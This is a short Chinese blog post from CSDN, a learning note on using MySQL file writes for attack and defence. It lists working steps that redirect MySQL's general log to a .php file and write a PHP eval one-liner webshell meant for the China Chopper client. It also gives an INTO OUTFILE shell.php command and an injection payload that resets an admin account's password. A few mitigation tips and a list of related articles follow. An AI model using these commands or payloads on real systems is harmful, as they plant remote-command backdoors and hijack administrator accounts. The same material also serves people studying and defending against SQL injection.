sql注入文件写入攻防的学习心得

最新推荐文章于 2023-04-08 18:09:30 发布
最新推荐文章于 2023-04-08 18:09:30 发布
阅读量757 收藏
点赞数
分类专栏: MySQL 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37428140/article/details/102943914
版权

第一种方式

cd C:\phpStudy\PHPTutorial\MySQL\bin
mysql -hlocalhost -uroot -proot
set global general_log=on;
set global general_log_file='C:\\Users\\Administrator\\Desktop\\conf\\shell.php';
select  "<?php @eval($_POST['cmd']); ?>";//一句话木马,用中国菜刀连接
set global general_log=off;
//导出文件后缀为.php,php在执行此文件时,只有<?php ?>中间的代码会被执行,其他内容按html输出,不影响php执行一句话代码
//最根本解决方法有
//1,定期修改mysql密码
//2,检查提交页面数据过滤
//3,添加php_suhosin.dll扩展禁止eval();执行,windows下此方式实现有难度。
//111');UPDATE zd_admin SET name='admin',password='admin' where id = 1; select * from zd_admin where (name='3333

第二种方式

select * from admin into outfile 'C:\\phpStudy\\PHPTutorial\\other\\shell.php';

在此,强烈谴责通过科技手段,进行违法犯罪活动的人,你都不配做一个人!

西红柿炒番茄31
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
原创:APT之网站SQL注入导致的文件任意上传
08-24
原创:APT之网站SQL注入导致的文件任意上传
sql注入文件写入
一只菜鸟的博客
10-31 1787
sql注入写入webshell的几种方式 secure_file_priv="c:/…"被注释掉或者是web路径 php.ini中的get_magic_quotes_gpc()函数未开启 其中secure_file_priv有三种情况 在进行写入websell时,要注意参数secure_file_priv是否有指定路径或者是否为null。最好要获得root权限 空,表示导入导出没有任何限制 有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件 nul
ERROR 1290 (HY000): --secure-file-priv option
weixin_34186950的博客
11-12 115
select concat('KILL ',id,';') from information_schema.processlist where user='root' into outfile '/tmp/test.txt'; ERROR 1290 (HY000): The MySQL server is running with the --secur...
SQL注入写入文件方法(获取webshell)
Goodric的博客
04-08 2455
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
sql注入 - 读写文件
wcy19990628的博客
02-10 331
文件: http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file("D:\\phpStudy\\PHPTutorial\\Apache\\conf\\httpd.conf")-- - 在显示位上显示apachectl的配置文件的信息 这就是load_file()函数的用法 2.写文件 http...
关于SQL注入文件读写的方法总结
09-09
主要给大家介绍了关于SQL注入文件的读写方法,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
基于Python的机器学习检测SQL注入.zip
最新发布
03-03
基于Python的机器学习检测SQL注入.zip 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 ...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入全面讲解技术文档
03-31
全文分为十三章全面的分析sql注入,使您学习的好助手。 目录 1.SQL注入漏洞全接触--入门篇 1 2.SQL注入法攻击一日通 8 3.SQL Server应用程序中的 高级SQL注入 19 4.编写通用的ASP防SQL注入攻击程序 22 5.利用instr...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入篇——文件读写注入
爱国小白帽
02-10 4077
文件读写注入的原理 就是利用文件的读写权限进行注入 文件读写注入的条件 1、读写文件需要secure_file_priv权限 secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 secure_file_priv=d:/phpstudy/mysql/data 代表只能对该路径下文件进行读写 2、知道网站绝对路径 Wi...
关于sql注入的一些个人心得
weixin_34250434的博客
12-26 470
sql 注入就是通过用户提交的数据中加入一些特殊字符如单引号等来影响sql命令的行为 这些网上都有很多说明,只要搜一下都会有很多。 我这里要说的是大家可能会不注意的地方,大部分新手会认为sql注入只是通过地址栏里的参数来注入好一点的会知道通过表单提交的数据来注入,很少有人会注意到通过一些隐藏的域或都不可输入的表单项来注入 其实像<select> checkbox radio &l...
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4200
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7021
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够高,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
SQL注入读写文件
weixin_43765321的博客
03-02 3609
1. 读写文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件可读。 文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
web渗透-SQL注入文件操作
豆豆不在了
03-01 990
SQL文件操作原理 在判定数据库连接权限的条件下,利用SQL操作函数 SELECT LOAD_FILE('E://test.txt') #下载文件 or SELECT 'nihao' INTO OUTFILE 'E://test1.txt' #上传写入文件 语句对网站服务器进行本地文件操作。 一般只有root连接用户才能进行文件操作。 攻击步骤: 1.获
SQL注入
bossDDYY的博客
09-20 1340
sql注入
SQL注入-文件读写】文件的读取+写入:函数、使用方法
05-30 8409
SQL注入文件读写
利用SQL注入进行文件读写(详细步骤的实现+图)【靶场:sqli-labs/Less-7】
weixin_46709219的博客
12-15 3298
原理啊,成因啊就不再啰嗦了,直接上实现过程。 一)环境: 攻击机:192.168.67.140 目标主机:192.168.67.143 二)实际操作: 利用mysql的读写文件函数进行文件的读取: 在目标主机的(win7-2)E盘下新建一个flag.txt文件,可以通过输入 select load_file("E:\\flag.txt"); 命令读取指定路径下的flag.txt文件的内容: 在实际中通过漏洞利用进行文件读取: 在攻击机(win7-1)中访问存在SQL注入的网站(如目标主机win7-2中的
sql注入如何写入webshell
05-11
在实施 SQL 注入攻击后,如果漏洞利用成功,攻击者可以通过 SQL 注入漏洞将任意命令注入到 SQL 语句中,从而达到执行任意代码的目的。以下是一些可能的方法: 1. 利用 union select 语句:在注入点处添加 union ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值